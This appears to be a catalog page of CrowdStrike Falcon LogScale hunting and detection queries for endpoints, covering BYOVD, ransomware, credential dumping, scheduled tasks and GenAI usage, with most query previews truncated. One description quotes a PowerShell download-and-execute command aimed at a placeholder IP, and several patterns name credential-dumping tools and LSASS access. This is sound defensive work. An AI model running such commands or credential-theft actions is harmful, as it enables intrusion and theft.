EDR

118 queries in this category


Applications Spawning CMD or Powershell

Table listing processes that spawned cmd.exe or powershell.exe child processes.

"#event_simpleName" = ProcessRollup2 event_platform="Win" FileName=/(cmd.exe|powershell.exe)/i
| wildcard(field=ComputerName, pattern=?ComputerName, ignoreCase=true)
| groupBy([ParentBaseFileName], function=[count(aid, distinct=true, as="DistinctHosts")])
| sort(DistinctHosts)
Tags: EDR, hunting, intermediate

Applications with plaintext passwords

Table of applications identified as potentially handling plaintext passwords.

"#event_simpleName" = ProcessRollup2 event_platform="Win" CommandLine=/REDACTED/
| wildcard(field=ComputerName, pattern=?ComputerName, ignoreCase=true)
| groupBy([FileName], function=[count(aid, distinct=true, as="Hosts")])
| sort(Hosts)
Tags: EDR, hunting, intermediate

Assigned Sensor Update Policy

This query will output a table with all hosts and their sensor update logic / assigned sensor update policy.

defineTable(
    query={
        #repo="sensor_metadata" #data_source_name="policyinfo" #data_source_group="sensor-update"
        | groupBy(id, function=selectFromMax(field="@timestamp", include=[release_id]))
Tags: EDR, monitoring, intermediate

BYOVD Driver Load with EDR/AV Process Termination (Medusa Ransomware)

Detects Bring Your Own Vulnerable Driver (BYOVD) attacks by correlating vulnerable kernel driver loads with security software termination on the same host. This technique has been actively used by the Medusa ransomware group to disable EDR/AV tooling before encryption. Covers both known-bad driver names and anomalous driver loads from user writable paths.

/* Phase 1 — Detect BYOVD: known-vulnerable or out-of-place signed drivers */
#event_simpleName = DriverLoad OR #event_simpleName = ClassifiedModuleLoad
| case {
    in(field=FileName, values=[
Tags: EDR, hunting, intermediate

Calculate Last Windows Boot Time

Outputs the last reboot timestamp and calculates the time elapsed since then.

#event_simpleName=AgentOnline event_platform=Win  
| groupBy([aid], function=([selectLast([BaseTime])]))
| LastReboot_milli:=(BaseTime/1000*1024)+978307200
| round("LastReboot_milli")
Tags: EDR, monitoring, intermediate

Charon Ransomware Detection and Correlation

The query chain detects and correlates multiple indicators of the Charon ransomware attack lifecycle, including ransomware package writes, malicious DLL sideloading, process execution triggers (notably via svchost.exe), creation of ransom notes, and suspicious service creation (WWC.sys). It merges these findings across several event types to confirm successful ransomware deployment.

defineTable(query={#event_simpleName=/Written|PeFileWritten/iF
|case{
  in(field="SHA256HashData", values=["f3c8b4986377b5a32c20fc665b0cbe0c44153369dadbcaa5e3d0e3c8545e4ba5","e0a23c0d99c45d40f6ef99c901bacf04bb12e9a3a15823b663b392abadd2444e","5d0675f20eeb8f824097791711135a273680f77bf5e9f0e168074e97464f21b5","739e2cac9e2a15631c770236b34ba569aad1d1de87c6243f285bf1995af2cdc2"]) |rename(field="SHA256HashData", as="RansomeSHA256")|rename(field="FileName", as="RansomewareFileWritten")|Analysis:="Ransomware Package written to disk"; //5d0675f20eeb8f824097791711135a273680f77bf5e9f0e168074e97464f21b5 is not malicious
Tags: EDR, hunting, intermediate

Check Domain Controller for NSX Driver

This query helps to determine if NSX drivers are installed on Domain Controllers to investigate limited Identity Protection functionality.

event_platform=/Win/i #event_simpleName=/DriverLoad/i 
| in(field=FileName,values=["vnetwfp.sys", "vnetflt.sys"],ignoreCase=true) 
| join({$falcon/investigate:aid_master()}, field=aid, key=aid, include=[ProductType]) 
| ProductType=2 
Tags: EDR, monitoring, intermediate

Chromium-Based Browser Hunting via DLL Load

This query identifies Chromium-based browsers by detecting the loading of chrome.dll into running processes. Unlike simple process name checks, this method helps uncover browsers that may not be named chrome.exe but still rely on Chromium components. The query excludes known chrome.exe processes to highlight less obvious Chromium-based browsers, although it’s important to note that not all Chromium-based browsers necessarily load chrome.dll.

defineTable(query={#event_simpleName=ClassifiedModuleLoad
| ImageFileName=/chrome\.dll/i
| TargetImageFileName!=/chrome\.exe/i}, include=[ComputerName, TargetProcessId], name="DllLoads")
| #event_simpleName=ProcessRollup2 TargetProcessId=*
Tags: EDR, hunting, intermediate

Connections to Tor Exit Nodes

Detects network connections to or from known Tor exit nodes by matching endpoint telemetry against a curated lookup file of Tor exit node IPs.

#event_simpleName=NetworkConnectIP4
| match(file="tor-exit-nodes.csv", field=RemoteAddressIP4, column=ip, strict=true)
| groupBy(
    [aid, ComputerName],
Tags: EDR, hunting, intermediate

Count Windows Discovery Commands

This query counts the execution of discovery / reconnaissance commands.

// Insert Discovery commands of interest here
event_platform=Win #event_simpleName=ProcessRollup2 FileName=/(whoami|ping|net1?|systeminfo|quser|ipconfig)/iF

// Restrict to non-system UserSid Values
Tags: EDR, hunting, intermediate

Created Local User Accounts

Table of all created local user accounts including UserName, ComputerName, aid, aip, and LocalIP.

#event_simpleName=UserAccountCreated
| table([@timestamp, UserName, aid, aip, ComputerName, event_platform, LocalIP, name], limit=20000)
| sort(@timestamp)
Tags: EDR, monitoring, intermediate

Credential Dumping Detection

This query detects potential credential dumping activities by monitoring process access to LSASS and suspicious memory operations.

#event_simpleName=ProcessRollup2 
| (CommandLine=/mimikatz|procdump|lsass|sekurlsa/i OR ImageFileName=/\\(mimikatz|procdump|pwdump)\.exe$/i)
| ParentImageFileName!=/\\(powershell|cmd)\.exe$/i
| join({#event_simpleName=UserIdentity}, field=AuthenticationID, include=[UserName])
Tags: EDR, hunting, intermediate

CVE-2025-1146 - System Scoping using aid_master

The query below will look for Linux systems (Linux, K8, Containers) that need to be updated against CVE-2025-1146. The query is based on the lookup file aid_master_main.csv which is automatically updated every 4 hours.

/* 

The query below will look for Linux systems (Linux, K8, Containers) that need to be updated against CVE-2025-1146.   
Tags: EDR, monitoring, intermediate

CVE-2025-1146 - System Scoping using OsVersionInfo & Logon Data

The query below will look for Linux systems (Linux, K8, Containers) that need to be updated against CVE-2025-1146. The query is based on the event OsVersionInfo which is generated every 24-hours, at sensor start, or at sensor update. It attempts to merge in LogonType 2 and 10 to determine the last logged on user.

/* 

The query below will look for Linux systems (Linux, K8, Containers) that need to be updated against CVE-2025-1146. 
Tags: EDR, monitoring, intermediate

CVE-2025-1146 - System Scoping using OsVersionInfo

The query below will look for Linux systems (Linux, K8, Containers) that need to be updated against CVE-2025-1146. The query is based on the event OsVersionInfo which is generated every 24-hours, at sensor start, or at sensor update.

/* 

The query below will look for Linux systems (Linux, K8, Containers) that need to be updated against CVE-2025-1146. 
Tags: EDR, monitoring, intermediate

CVE-2025-53770 - SharePoint ToolShell

WebShell Discovery from w3wp.exe

// CVE-2025-53770 - WebShell Discovery from w3wp.exe

correlate(
    cmd: {
Tags: EDR, detection, intermediate

CVE-2025-59287 vulnerable WSUS servers identification

This query identifies WSUS servers that have the wsusservice enabled and that are vulnerable to CVE-2025-59287.

// Make table that contains Agent ID values of Windows systems with WSUS service discovered
| defineTable(query={
  #repo = "base_sensor" event_platform=Win #event_simpleName="ProcessRollup2" FileName="wsusservice.exe"
  | groupBy([aid], function=[]
Tags: EDR, hunting, monitoring, intermediate

CVE-2025-59287 - WSUS Identification+Vulnerability Query

The query below outputs a list of your Windows servers with a Falcon sensor, tells you if they need to be patched for the CVE or not, when the data was last updated, and if WSUS was "detected". https://www.reddit.com/r/crowdstrike/comments/1ohdzpm/comment/nlnti7p/

// Make a bad attempt to locate WSUS-involved devices
| defineTable(query={
  #repo = "base_sensor" #event_simpleName="ProcessRollup2" and "WSUS"
  | groupBy([ComputerName])
Tags: EDR, detection, intermediate

Decode SignInfoFlags

The query decodes SignInfoFlags from Windows process events to identify signature details and highlight unsigned or improperly signed executables.

#event_simpleName=ProcessRollup2 UserSid=/^S-1-5-21-/ SignInfoFlags=*
| bitfield:extractFlags(
    field=SignInfoFlags,
    output=[
Tags: EDR, hunting, intermediate

Decode VolumeDeviceCharacteristics Bitmask

The query decodes the VolumeDeviceCharacteristics bitfield to reveal device properties such as removable media, network drives, virtual volumes, or portable devices.

| bitfield:extractFlags(
    field=VolumeDeviceCharacteristics,
    output=[
    [0,FILE_REMOVABLE_MEDIA],
Tags: EDR, hunting, intermediate

Deleted Local User Accounts

Table of all deleted local user accounts including UserName, ComputerName, aid, aip, and LocalIP.

#event_simpleName=UserAccountDeleted
| groupBy([UserName, aid, aip, ComputerName, event_platform, LocalIP, name], function=selectLast([@timestamp]))
| table([@timestamp, UserName, ComputerName, aid, aip, event_platform, LocalIP, name])
| sort(@timestamp)
Tags: EDR, monitoring, intermediate

Detect and Decode Base64-Encoded PowerShell Commands - http

The query identifies Windows PowerShell executions using encoded commands, extracts and decodes Base64 payloads (including nested encodings), counts occurrences and unique hosts, and outputs decoded command content for analysis of potentially obfuscated activity.

#event_simpleName=ProcessRollup2 event_platform=Win ImageFileName=/.*\\powershell\.exe/
| CommandLine=/.*\s+\-(e|encoded|encodedcommand|enc)\s+.*/
| length("CommandLine", as="cmdLength")
| groupby([CommandLine], function=stats([count(aid, distinct=true, as="uniqueEndpointCount"), count(aid, as="executionCount")]), limit=max)
Tags: EDR, hunting, intermediate

Detect and Decode Base64-Encoded PowerShell Commands

The query identifies Windows PowerShell executions using encoded commands, extracts and decodes Base64 payloads (including nested encodings), counts occurrences and unique hosts, and outputs decoded command content for analysis of potentially obfuscated activity.

#event_simpleName=ProcessRollup2 event_platform=Win ImageFileName=/.*\\powershell\.exe/
| CommandLine=/\s+\-(e|encoded|encodedcommand|enc)\s+/i
| CommandLine=/\-(?<psEncFlag>(e|encoded|encodedcommand|enc))\s+/i
| length("CommandLine", as="cmdLength")
Tags: EDR, hunting, intermediate

Detect Critical Environment Variable Changes over SSH with Connection Details

The query identifies changes to critical environment variables, extracts connection details such as user, local and remote IPs and ports, and provides a direct link to the related process in Falcon Process Explorer.

#event_simpleName=CriticalEnvironmentVariableChanged
| EnvironmentVariableName =/(SSH_CONNECTION|USER)/
| EnvironmentVariableValue=/(?<localIP>\d+\.\d+\.\d+\.\d+)\s+(?<localPort>\d+)\s+(?<remoteIP>\d+\.\d+\.\d+\.\d+)\s+(?<remotePort>\d+)$/i
| table([@timestamp, aid, userName, remoteIP, remotePort, localIP, localPort])
Tags: EDR, hunting, intermediate

Detect Data Exfiltration via external storage devices

This query shows unusual activity involving external storage devices, such as large file copy operations or bulk transfers to physical external media. While USB devices are common for legitimate use, adversaries may exploit them to exfiltrate confidential data outside normal monitoring channels. Such activity is especially concerning in restricted environments, as it bypasses network-based detection controls and can indicate insider threat or physical compromise.

#event_simpleName=/FileWritten/i and IsOnRemovableDisk = 1
| VolumeSessionUUID=*
| "Size (MB)" := Size/1024/1024
| format(format="%.2f", field=["Size (MB)"], as="Size (MB)")
Tags: EDR, hunting, intermediate

Detect locally disabled RTR

This query identifies hosts with locally disabled RTR.

#event_simpleName=SensorHeartbeat
| groupBy([aid], function=selectLast([@timestamp, ComputerName, SensorStateBitMap]), limit=max)
| bitfield:extractFlags(
    field=SensorStateBitMap,
Tags: EDR, monitoring, intermediate

Detect NTLMv1 Authentications (Windows Event Logs)

This query detects NTLM v1 authentications using Windows Event Log telemetry.

| windows.EventData.AuthenticationPackageName=NTLM
| windows.EventData.LmPackageName!= "NTLM V2" 
| groupBy([windows.EventData.WorkstationName, user.target.name, windows.EventData.KeyLength])
| rename(field="windows.EventData.WorkstationName", as="Hostname")
Tags: EDR, hunting, intermediate

Detect RTR High Risk Commands

Detects the execution of high-risk RTR commands such as get, put, memdump, xmemdump, run, and put-and-run.

// Get UI Audit Events
#repo="detections" ExternalApiType=/Remote/

// Check commands for "get", "put", "memdump", "xmemdump", "run", "put-and-run"
Tags: EDR, monitoring, intermediate

Detect Suspicious Windows Command-Line Activity Using System Utilities

The query analyzes Windows ProcessRollup2 events to identify unusual use of common administrative tools (e.g., net.exe, sc.exe, nltest.exe, systeminfo.exe). It assigns behavior weights based on command-line patterns, aggregates activity per host and hour, flags systems with high or frequent activity, and provides direct links for host investigation in Falcon.

// Get all Windows ProcessRollup2 Events
#event_simpleName=ProcessRollup2 event_platform=Win
// Narrow to processes of interest and create FileName variable
| ImageFileName=/\\(?<FileName>(whoami|net1?|systeminfo|ping|nltest|sc|hostname|ipconfig)\.exe)/i
Tags: EDR, hunting, intermediate

Detection of DNS Requests to AI-Related Domains

This query identifies DNS requests to domains listed in the AI-Domains.csv lookup. It filters out browser-initiated traffic from Chrome and Edge. The result highlights which hosts and processes are generating the most DNS requests to those domains.

#event_simpleName=DnsRequest event_platform=Win
| match(file="generative-ai-domains.csv", field=[DomainName],column=domain,ignoreCase=true,mode=glob)
| !in(field=ContextBaseFileName, values=[msedge.exe,chrome.exe],ignoreCase=true)
| SourceProcess := ContextBaseFileName
Tags: EDR, hunting, intermediate

Detection of External Direct IP Usage in CommandLine Windows and Mac

This query detects Windows processes that use raw public IP addresses within HTTP/HTTPS URLs in their command-line arguments (e.g., powershell -c IEX(New-Object Net.WebClient).DownloadString('http://1.2.3.4/payload')). This behavior is highly suspicious because legitimate software typically uses domain names (DNS). Attackers often use direct public IPs to host second-stage payloads or C2 servers to bypass DNS filtering and logging mechanisms.

in(#event_simpleName, values=["ProcessRollup2","SyntheticProcessRollup2"])
| CommandLine=*http* event_platform!="Lin"
// Baseline to exclude legitimate processes
//| !in(field="ParentBaseFileName", values=//["UmbrellaDiagnostic.exe","HPClickExe","Eagle" ,"HPClick.exe"])
Tags: EDR, hunting, detection, intermediate

Detection of Generic User Account Usage

This query identifies the use of generic or shared user accounts by leveraging a predefined lookup file containing known default and non-personalized usernames (e.g., admin, test, root).

"#event_simpleName" = UserLogon | user.name := lower("user.name") | groupBy(user.name,ComputerName) | match(file="generic-usernames.csv", field=[user.name], column=[username])
| table([user.name, ComputerName, _count])
| User := rename(user.name)
| Host := rename(ComputerName)
Tags: EDR, detection, intermediate

Devices in RFM state

#event_simpleName=OsVersionInfo
| groupBy([aid, ComputerName, RFMState], function=selectLast([@timestamp]))
| RFMState = 1
Tags: EDR, monitoring, intermediate

Dll-Side Loading Detection Query

The query traces processes that write both DLL and EXE files to the same location while exhibiting masquerading behavior.

// Trace the ProcessId of a process that writes at least one EXE and one DLL to the same path, masquerades its OriginalFilename, and has at least one written DLL whose author is Microsoft ("DLL-Filewrite"); tracked throughout as SusProcessID
defineTable(query={#event_simpleName=/(PeFileWritten)/iF 
|lowercase("FileName")
|lowercase("OriginalFilename")
Tags: EDR, hunting, intermediate

DNS Resolutions from Browser Processes

This query correlates web browser process executions with their DNS queries to identify which domains were resolved by browser processes on specific endpoints.

// Get all process execution and DNS events on Windows
(#event_simpleName=ProcessRollup2 OR #event_simpleName=DnsRequest) event_platform=Win
| ComputerName=~wildcard(?ComputerName, ignoreCase=true)
// Normalize file name value across both events
Tags: EDR, hunting, intermediate

DNS Staging Detection: ClickFix-Inspired nslookup Execution

Detects nslookup activity used for DNS-based staging, specifically targeting the pattern of querying external nameservers to retrieve and execute malicious payloads, as seen in recent ClickFix attacks. This hunt is highly valuable as it identifies a shift away from heavily-monitored tools like mshta and PowerShell toward abusing trusted network utilities to bypass standard firewalls and blend with legitimate DNS traffic.

// Start with process execution events for performance
#event_simpleName = ProcessRollup2
// Filter for nslookup.exe
| ImageFileName = /\\nslookup\.exe$/i
Tags: EDR, hunting, detection, intermediate

Domain Controllers with high load

Domain controllers whose average CPU usage or average RAM usage exceeds 80%, or whose available disk space is below 10 GB. This indicates low capacity or unexpected excessive usage.

//Table to list DC hardware capacity
| defineTable(query={#repo=base_sensor #event_simpleName="SystemCapacity"
| in(field=cid, values=[?SelectedCid])
| match(file="aid_master_main.csv", field=[cid, aid])
Tags: EDR, monitoring, intermediate

Enriched Process Tree Association Events

The query filters for AssociateTreeIdWithRoot events, joins them with detection-pattern metadata from a CSV file, and outputs key fields like timestamp, host, pattern details and severity for analysis. In short, it enriches process-tree association events with contextual detection information.

#event_simpleName=AssociateTreeIdWithRoot
| PatternId =~ match(file="falcon/investigate/detect_patterns.csv", column=PatternId, strict=false)
| select([@timestamp, aid, ComputerName, PatternId,name,scenario,scenarioFriendly,description,severity,show_in_ui,killchain_stage,tactic,technique,objective,pattern_updated])
Tags: EDR, detection, intermediate

Enumerate Windows Driver Loads

The query combines DriverLoad and Event_ModuleSummaryInfoEvent data to associate loaded driver hashes with their certificate details, simplifying file paths and aggregating filenames, subjects, and issuers for analysis of driver authenticity.

// Get all DriverLoad events and Event_ModuleSummaryInfoEvent events so certificate data can be merged in
(#event_simpleName=DriverLoad event_platform=Win) OR (#repo=detections ExternalApiType=Event_ModuleSummaryInfoEvent )
// Shorten file path from DriverLoad event
| case{
Tags: EDR, hunting, intermediate

Evaluate Operating System Prevalence

This query counts how many Windows endpoints are running each OS version (like Windows 10, Windows 11, etc.) in your CrowdStrike environment. It groups endpoints by their current OS product name and returns the count for each version.

#event_simpleName=OsVersionInfo event_platform=Win
| groupby(aid, function=selectLast([ProductName]))
| groupBy([ProductName], function=stats([count(aid, as="endpointCount")]))
Tags: EDR, monitoring, intermediate

Exploitable Critical Vulnerabilities

Shows Critical CVEs that are considered exploitable (based on ExploitStatusEnum > 30). Results are aggregated by CVE and exploitability state, including the number of affected hosts.

#event_simpleName=FEMVulnerabilityMutation
| FEMVulnerabilityMutation.VulnerabilityInstance.Cve.Severity = Critical
| FEMVulnerabilityMutation.VulnerabilityInstance.Cve.ExploitStatusEnum > 30
| groupBy([FEMVulnerabilityMutation.VulnerabilityInstance.Cve.Id, FEMVulnerabilityMutation.VulnerabilityInstance.Cve.Severity,FEMVulnerabilityMutation.VulnerabilityInstance.Cve.ExploitStatus],function=count(FEMVulnerabilityMutation.VulnerabilityInstance.HostInfo.Hostname))
Tags: EDR, monitoring, intermediate

External Connections with Process

#event_simpleName=NetworkConnectIP4 aid=?aid ComputerName=?Computername RemoteAddressIP4=?RemoteIP 
| !cidr(RemoteAddressIP4, subnet=["10.0.0.0/8","192.168.0.0/16","172.16.0.0/12","127.0.0.0/8"])
| join({#event_simpleName=ProcessRollup2  FileName=?Processname }, field=[ContextProcessId],key=TargetProcessId, include=[FileName, UserName,ImageFileName, RemoteAddressIP4, RemotePort,CommandLine], mode=left)
| groupBy(UserName, function=collect([FileName, UserName, ImageFileName, RemoteAddressIP4, RemotePort, CommandLine]))
Tags: EDR, hunting, intermediate

Failed and Successful User Logon Events

This query correlates successful and failed logon attempts per user account to identify potential compromise patterns, focusing on accounts with 4+ failed logons. It provides a comprehensive view of each user's authentication activity including password age and last successful access.

#event_simpleName=/UserLogon/
| case{
    #event_simpleName=UserLogon | SuccessLogonTime:=ContextTimeStamp;
    #event_simpleName=UserLogonFailed2 | FailedLogonTime:=ContextTimeStamp;
Tags: EDR, monitoring, intermediate

Failed logon attempts grouped by UserName and unique endpoints involved

#event_simpleName = UserLogonFailed
| groupBy(UserName, function=([count(timestamp, distinct=true, as=uniqueFailedLogons), (count(aid, distinct=true, as=uniqueEP)), collect(fields = [ComputerName, aid], limit =10000)]))
| default(field = "UserName", value="-", replaceEmpty=true)
| uniqueFailedLogons >= 5
Tags: EDR, hunting, intermediate

Failed User Logon Thresholding

This query identifies Windows failed login attempts that exceed a threshold (5+ failures), helping detect potential brute-force attacks or account compromise attempts.

// Get Windows UserLogonFailed events
event_platform=Win #event_simpleName=UserLogonFailed2

// This line is completely optional, but converts SubStatus to hex
Tags: EDR, detection, intermediate

Falcon Sensor Heartbeat Timechart

This query plots a timechart showing the frequency of Falcon sensor heartbeat events across the environment.

#event_simpleName=SensorHeartbeat
| timeChart(span=30min, function=count(as=SensorHeartbeat))
Tags: EDR, monitoring, intermediate

Falcon Sensor Support Status

This query lists all active Falcon sensors including their release date and support end date.

#repo=sensor_metadata #data_source_name=aidmaster #data_source_group=aidmaster-api
| groupBy([aid], function=([selectFromMax(field="@timestamp", include=[ComputerName, Time, Version, ConfigIDBuild, AgentVersion])]))
| match(file="falcon/helper/sensors_support_info.csv", field=ConfigIDBuild, column=BUILD, ignoreCase=true, strict=true)
| parseTimestamp("M/d/yy",field=SUPPORT_ENDS, as=SUPPORT_ENDS_EPOCH, timezone="UTC")
Tags: EDR, monitoring, intermediate

Falcon Sensor Version Drift Monitoring (Linux)

Compares CrowdStrike Falcon sensor major/minor versions (x.xx) over time for each host. The query detects version changes, classifies them as upgrades or downgrades, and outputs the timestamp of the change along with the previous and current version values.

defineTable(query={"#event_simpleName" = OsVersionInfo AgentVersion=*
| groupBy([aid,ComputerName,AgentVersion],function=min("@timestamp"))
}, include=[aid,ComputerName,AgentVersion,_min], name="time")
| defineTable(query={"#event_simpleName" = OsVersionInfo AgentVersion=*
Tags: EDR, monitoring, intermediate

Falcon Sensor Version Drift Monitoring (MacOS)

Compares CrowdStrike Falcon sensor major/minor versions (x.xx) over time for each host. The query detects version changes, classifies them as upgrades or downgrades, and outputs the timestamp of the change along with the previous and current version values.

defineTable(query={"#event_simpleName" = OsVersionInfo AgentVersion=*
| groupBy([aid,ComputerName,AgentVersion],function=min("@timestamp"))
}, include=[aid,ComputerName,AgentVersion,_min], name="time")
| defineTable(query={"#event_simpleName" = OsVersionInfo AgentVersion=*
Tags: EDR, monitoring, intermediate

Falcon Sensor Version Drift Monitoring (Windows)

Compares CrowdStrike Falcon sensor major/minor versions (x.xx) over time for each host. The query detects version changes, classifies them as upgrades or downgrades, and outputs the timestamp of the change along with the previous and current version values.

defineTable(query={"#event_simpleName" = OsVersionInfo AgentVersion=*
| groupBy([aid,ComputerName,AgentVersion],function=min("@timestamp"))
}, include=[aid,ComputerName,AgentVersion,_min], name="time")
| defineTable(query={"#event_simpleName" = OsVersionInfo AgentVersion=*
Tags: EDR, monitoring, intermediate

File Write Events with Human-Readable File Sizes

The query lists file write events and converts the file size into readable units (KB, MB, GB, or TB), displaying timestamps, host details, filenames, and both raw and formatted file sizes.

#event_simpleName=/FileWritten$/ 
| case {
    Size>=1099511627776 | CommonSize:=unit:convert(Size, to=T) | format("%,.2f TB",field=["CommonSize"], as="CommonSize");
    Size>=1073741824 | CommonSize:=unit:convert(Size, to=G) | format("%,.2f GB",field=["CommonSize"], as="CommonSize");
Tags: EDR, hunting, intermediate

Files Written to Removable Media

This query tracks files written to removable media (USB drives, external drives) across all platforms, aggregating the total data volume and file count per computer. It's useful for detecting potential data exfiltration attempts or monitoring removable media usage for compliance.

#event_simpleName=/Written/ IsOnRemovableDisk=1 
| FileSizeMB:=unit:convert(Size, to=M) 
| groupBy([ComputerName], function=([sum(Size, as=SizeBytes), sum(FileSizeMB, as=FileSizeMB), count(TargetFileName, as="File Count"), collect([TargetFileName])]))
Tags: EDR, hunting, intermediate

Find events that are scheduled

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| Trigger:=rename(Task.Triggers.CalendarTrigger.Enabled)
| Trigger=* // Remove this line if you don't care if it's empty
Tags: EDR, hunting, intermediate

Find events triggered at a specific time

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| Trigger:=rename(Task.Triggers.TimeTrigger.Enabled)
| Trigger=* // Remove this line if you don't care if it's empty
Tags: EDR, hunting, intermediate

Find events triggered at logon

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| Trigger:=rename(Task.Triggers.LogonTrigger.Enabled)
| Trigger=* // Remove this line if you don't care if it's empty
Tags: EDR, hunting, intermediate

Find events triggered at startup

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| Trigger:=rename(Task.Triggers.BootTrigger.Enabled)
| Trigger=* // Remove this line if you don't care if it's empty
Tags: EDR, hunting, intermediate

Find events triggered on an event

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| Trigger:=rename(Task.Triggers.EventTrigger.Enabled)
| Trigger=* // Remove this line if you don't care if it's empty
Tags: EDR, hunting, intermediate

Find hidden scheduled tasks

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| Hidden:=rename(Task.Settings.Hidden)
| Hidden=/true/i
Tags: EDR, hunting, intermediate

Find OpenClaw on Endpoints

Identifies the installation, configuration, and execution of the OpenClaw (Moltbot/Clawdbot) autonomous AI agent. OpenClaw poses a significant risk for shadow AI and data exfiltration as it requires extensive permissions (Shell, APIs, Local Files) and is often controlled via messaging apps like WhatsApp or Telegram.

#repo="base_sensor"
| #event_simpleName =~ in(values=["*ProcessRollup2", "*FileWritten"])
| case {
  // Look for the curl install method
Tags: EDR, hunting, intermediate

Find processes that only ran a few times on a specific host

#event_simpleName=ProcessRollup2 OR #event_simpleName=SyntheticProcessRollup2
| aid=?aid
| groupBy([SHA256HashData, ImageFileName], limit=max)
| _count <5
Tags: EDR, hunting, intermediate

Find tasks scheduled by logon type

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| LogonType:=rename(Task.Principals.Principal.LogonType)
| LogonType=* // Remove this line if you don't care if it's empty
Tags: EDR, hunting, intermediate

Find tasks scheduled by run level

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| RunLevel:=rename(Task.Principals.Principal.RunLevel)
| RunLevel=* // Remove this line if you don't care if it's empty
Tags: EDR, hunting, intermediate

Find tasks scheduled by user ID

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| UserId:=rename(Task.Principals.Principal.UserId)
| table([aid, UserId, TaskXml], limit=1000)
Tags: EDR, hunting, intermediate

Find tasks scheduled with ComHandler

#event_simpleName=ScheduledTaskRegistered
| parseXml(TaskXml)
| ComHandlerData:=rename(Task.Actions.ComHandler.Data)
| ComHandlerData=* // Remove this line if you don't care if it's empty
Tags: EDR, hunting, intermediate

Firewall Rule Additions

This query correlates processes with Windows Firewall rule modifications they triggered, identifying which executables are creating or modifying firewall rules.

#event_simpleName=ProcessRollup2
| join({#event_simpleName=FirewallSetRule}, key=ContextProcessId, field=TargetProcessId, include=[FirewallRule, FirewallRuleId])
| ImageFileName=/.*\\(?<fileName>.*\..*)/
| table([aid, UserSid, fileName, FirewallRuleId, FirewallRule, ImageFileName, CommandLine])
Tags: EDR, hunting, intermediate

Frequency Analysis via Program Clustering

This query detects potential reconnaissance or lateral movement activity by identifying Windows endpoints where three or more distinct discovery/enumeration tools were executed within 10-minute windows.

// Get file names of interest
event_platform=Win #event_simpleName=ProcessRollup2 FileName=/(whoami|arp|cmd|net|net1|ipconfig|route|netstat|nslookup|nltest|systeminfo|wmic|tasklist|tracert|ping|adfind|nbtstat|find|ldifde|netsh|wbadmin)\.exe/i

// Aggregate in 10 minute buckets; set search to 24 hours
Tags: EDR, hunting, intermediate

GenAI Usage

This query identifies DNS requests to GenAI services.

#event_simpleName=DnsRequest
| in(field=DomainName, values=[".ai", ".ai21.com", ".aleph-alpha.com", ".anthropic.com", ".assemblyai.com", ".bolt.ai", ".bubble.io", ".character.ai", ".claude.ai", ".clickup.com", ".codeium.com", ".cohere.ai", ".copy.ai", ".cursor.so", ".deepmind.com", ".deepseek.ai", ".deepl.com", ".dalle.ai", ".elevenlabs.io", ".feedhive.io", ".forefront.ai", ".grok.x.ai", ".gpt3.com", ".huggingface.co", ".inflection.ai", ".jasper.ai", ".llama.ai", ".looka.com", ".lovable.ai", ".midjourney.com", ".mistral.ai", ".openai.com", ".opus.ai", ".perplexity.ai", ".pi.ai", ".poe.com", ".replicate.com", ".runwayml.com", ".rytr.me", ".scale.com", ".stability.ai", ".sudowrite.com", ".synthesia.io", ".tabnine.com", ".together.ai", ".v0.dev", ".vercel.ai", ".vista.social", ".wordtune.com", ".writesonic.com", ".x.ai", ".you.com", "ai21.com", "aleph-alpha.com", "anthropic.com", "api.anthropic.com", "api.openai.com", "assemblyai.com", "bard.google.com", "bedrock.aws.amazon.com", "bolt.ai", "bubble.io", "character.ai", "chat.openai.com", "chatgpt.com", "claude.ai", "clickup.com", "codeium.com", "cohere.ai", "console.anthropic.com", "copilot.github.com", "copilot.microsoft.com", "copy.ai", "cursor.so", "dalle.ai", "deepmind.com", "deepseek.ai", "deepl.com", "elevenlabs.io", "ernie.baidu.com", "feedhive.io", "forefront.ai", "gemini.google.com", "gigachat.sberbank.ru", "grok.x.ai", "gpt3.com", "huggingface.co", "inflection.ai", "jasper.ai", "labs.perplexity.ai", "llama.ai", "looka.com", "lovable.ai", "midjourney.com", "mistral.ai", "openai.com", "opus.ai", "perplexity.ai", "pi.ai", "platform.openai.com", "poe.com", "replicate.com", "runwayml.com", "rytr.me", "scale.com", "stability.ai", "sudowrite.com", "synthesia.io", "tabnine.com", "together.ai", "v0.dev", "vercel.ai", "vista.social", "wordtune.com", "writesonic.com", "x.ai", "you.com"])
| groupBy([DomainName, ComputerName, event_platform])
| sort(field=_count,type=number,order=desc)
Tags: EDR, hunting, intermediate

Get Host Zero Trust Assessment Scores

This query outputs a table of hosts together with their Zero Trust Assessment scores (OS, sensor and overall).

event_type=ZeroTrustHostAssessment
| groupBy([aid], function=([selectFromMax(field="@timestamp", include=[scores.os, scores.sensor, scores.overall])]))
| join(query={#data_source_name=aidmaster }, field=[aid], include=[ComputerName, event_platform])
Tags: EDR, monitoring, intermediate

Get USB Devices

Retrieves a list of USB devices plugged into the host.

#event_simpleName=DcUsbDeviceConnected
| DeviceTimeStamp := parseTimeStamp(field=DeviceTimeStamp, format=seconds)
| "Time Inserted" := formatTime("%Y-%m-%dT%H:%M:%S.%L", field=DeviceTimeStamp, timezone="Zulu")
| rename([[ComputerName,"Host Name"],[DevicePropertyClassName,"Connection Type"],[DeviceManufacturer,Manufacturer],[DeviceProduct,"Product Name"], [DevicePropertyDeviceDescription,Description], [DevicePropertyClassGuid,GUID],[DeviceInstanceId,"Device ID"]])
Tags: EDR, monitoring, intermediate

Hunt for a file name

#event_simpleName=ProcessRollup2 OR #event_simpleName=SyntheticProcessRollup2
| aid=?aid
| ImageFileName like ?ImageFileName
| ImageFileName=/(\/|\\)(?<FileName>\w*\.?\w*)$/
Tags: EDR, hunting, intermediate

Hunt for specific Command Line Activity

#event_simpleName=ProcessRollup2 OR #event_simpleName=SyntheticProcessRollup2
| aid=?aid
| CommandLine like ?CommandLine
| ImageFileName=/(\/|\\)(?<FileName>\w*\.?\w*)$/
